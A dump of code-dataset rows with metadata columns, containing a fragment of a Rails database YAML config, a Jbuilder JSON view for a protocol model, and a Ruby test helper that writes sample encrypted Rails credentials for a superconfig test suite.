<<: *defaults
production:
database: dm_rails3_app_production.db
<<: *defaults
YAML
end
| 18.818182 | 40 | 0.677939 |
6a1e390a89391cb8ee322b4af58e8f3a9e831985 | 142 | json.extract! protocol, :id, :Name, :Version, :Type, :DefinitionData, :created_at, :updated_at
json.url protocol_url(protocol, format: :json)
| 47.333333 | 94 | 0.753521 |
ed40657bc07b7ff50610e9e67f9829baad3efcd0 | 638 | # frozen_string_literal: true
require "simplecov"
SimpleCov.start
require "bundler/setup"
require "rails"
require "superconfig"
require "minitest/autorun"
require "minitest/utils"
ENV["RAILS_MASTER_KEY"] = "ruby-on-rails-sample-credentials"
class TestApp < Rails::Application
def credentials
@credentials ||= encrypted("#{__dir__}/test.yml.enc")
end
end
ActiveSupport::EncryptedFile.new(
content_path: Pathname.new("#{__dir__}/test.yml.enc"),
key_path: Pathname.new("#{__dir__}/test.key"),
env_key: "RAILS_MASTER_KEY",
raise_if_missing_key: true
).write(YAML.dump(secret: "secret", another_secret: "another_secret"))
| 24.538462 | 70 | 0.752351 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.